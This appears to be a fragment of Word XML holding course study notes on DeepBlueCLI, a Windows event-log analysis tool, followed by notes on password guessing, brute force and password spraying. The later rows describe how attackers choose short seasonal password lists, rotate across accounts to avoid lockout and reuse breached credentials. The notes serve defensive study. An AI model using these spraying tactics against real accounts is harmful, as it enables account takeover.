              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Arial" w:hAnsi="Baskerville" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Is a PowerShell script that parses windows event logs, searches for unusual behavior or characteristics. Generates straightforward output characterizing the EOI.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D470644" w14:textId="4D794042"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6D379258" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="29AA8646" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13CE72E6" w14:textId="076E11D9"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DeepBlueCLI Capabilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24AF653C" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Can detect multiple attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77CB797F" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Several Metasploit exploits, Mimikatz, PowerShell Empire, password guessing, password spray, and more.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54010102" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Won’t detect each tool every </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>time, but</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> will detect many attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="721A9B8C" w14:textId="45909DF1" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use on a local system, over the windows domain network, or offline log files.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01CE3A55" w14:textId="446E803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000730F8"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99</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="1BD25D4E" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DEDE43B" w14:textId="04B2E7C8"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DeepBlueCLI Metasploit Attack Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5952C5" w14:textId="5E7289DE" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>See book for results of PowerShell command.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FC93744" w14:textId="451019E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66BB7724"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101</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="7D5A243A" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7052404A" w14:textId="03208F3B"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DeepBlueCLI Non-Malicious Event</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E79579D" w14:textId="132381CF" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DeepBlueCLI will also alert on potentially non-malicious activity. It is up to you as the analyst to interpret the DeepBlueCLI analysis based on your system knowledge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3022D7E9" w14:textId="74CC0721"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28B3949E"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102</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="2B2A7B82" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="062CC5A7" w14:textId="58045C34"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DeepBlueCLI Output Formatting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA73F74" w14:textId="77777777" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="713A3049" w14:textId="79FC803B"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60F882F5"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103</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="3D78F973" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D100FF" w14:textId="750A7F92"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DeepBlueCLI Conclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2ECD03B8" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DeepBlueCLI is a useful tool for quickly assessing Windows event logs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A14711B" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Read from local files on the file system.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D43C252" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Read from local even logs by log name.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B828F64" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Read from remote event logs in a windows domain.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AC3D3BC" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>DeepBlueCLI does not provide perfect analysis, but it does catch many different attacks common to know attack TTPs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="481FF726" w14:textId="659E960E" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>You as the analyst must judge the output with other known criteria to evaluate DeepBlueCLI output.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D5955B5" w14:textId="74A2EE07"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72E59F9E"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104</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="2DDEA97C" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65067D94" w14:textId="4736313E"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Visual Summary: DeepBlueCLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450C7793" w14:textId="77777777" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A540FF5" w14:textId="33E1695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619F703D"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105</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="1E82D91B" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5218D78E" w14:textId="25CA579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5E8E0A33" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Password guessing across the network:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A2A2D08"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Identify a valid user ID</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F0E51F8"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Create list of possible passwords.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="336B4434"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Try typing in each password.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35243FB4"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If system allows you in, success</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4AACBACD" w14:textId="77777777" w:rsidR="002664A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If not, try again.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F871F37" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use a script our automated tool to improve speed and accuracy.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DC56B87" w14:textId="77777777" w:rsidR="002664A6" w:rsidRPr="00FF1F19" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="82"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1F19">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Maximum speed typically between one guess every 3 seconds and at most 5 guesses per second.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79BAFF1E" w14:textId="77777777" w:rsidR="002664A6" w:rsidRPr="00FF1F19" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="82"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1F19">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Much slower than password cracking attacks.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1256CD" w14:textId="15DA2361" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Could trigger account lockout.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4098C5BF" w14:textId="4F598D6E" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A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3FE710F8" w14:textId="6C16A8F0"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="6F1FB5CF" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CCFA093" w14:textId="2C50DFE4" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="644FF0FB" w14:textId="77777777" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69DCB542" w14:textId="5748590B" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E130FD1" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53228A47" w14:textId="6C52C400" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:eastAsia="Calibri" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002664A6" w:rsidRPr="006F5A04" w14:paraId="55CFB2B1" w14:textId="77777777" w:rsidTr="00F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3325" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E8EB53F" w14:textId="40D97C80"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34B150FF" w14:textId="77777777" w:rsidR="002664A6" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>To avoid account lockout, attackers will perform a password spray attack.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="117D153D" w14:textId="77777777" w:rsidR="002664A6" w:rsidRPr="00FF1F19" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="83"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1F19">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Try a small number of passwords against a large number of accounts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06A48D65" w14:textId="77777777" w:rsidR="002664A6" w:rsidRPr="00FF1F19" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="83"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1F19">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Try 4 passwords for Account A, then the same four for account B, and so on for a thousand or more accounts.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33CBECDB" w14:textId="71D11310" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF1F19">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Then if no centralized authentication mechanism is employed, more from system 1 to system 2 until bad login counter expiration timer resets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="314A6587" w14:textId="198EB71A" w:rsidR="002664A6" w:rsidRPr="006F5A04" w:rsidRDefault="002664A6" w:rsidP="002664A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613770A4"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0CB63E27" w14:textId="3051F172" w:rsidR="00303D06"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To avoid account lockout, password guess and spray attacks use very short password lists.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03261785" w14:textId="77777777"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Choose common words, such as city names, company names, product names, and local sports teams.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36CE905D" w14:textId="77777777"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Choose names based on password reset intervals like every 90 days, reset? Try summer 2023 or fall 2023.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57B7BABF" w14:textId="2C5CE95D"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Alternative: Use known passwords for people in the organization from password compromise lists.</w:t>
            </w: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5E8E3A89" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="00475B12" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Username and passwords from compromised websites surface on trading sites.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="486269F2" w14:textId="77777777" w:rsidR="00475B12" w:rsidRDefault="00475B12" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Since users reuse passwords, attackers will check for cracked passwords from other websites.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C69BF19" w14:textId="77777777" w:rsidR="00475B12" w:rsidRDefault="00475B12" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Variations of a disclosed password, and username cross-referencing can improve attacker success rate.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20454978" w14:textId="1C158C16" w:rsidR="00475B12" w:rsidRPr="006F5A04" w:rsidRDefault="00475B12" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
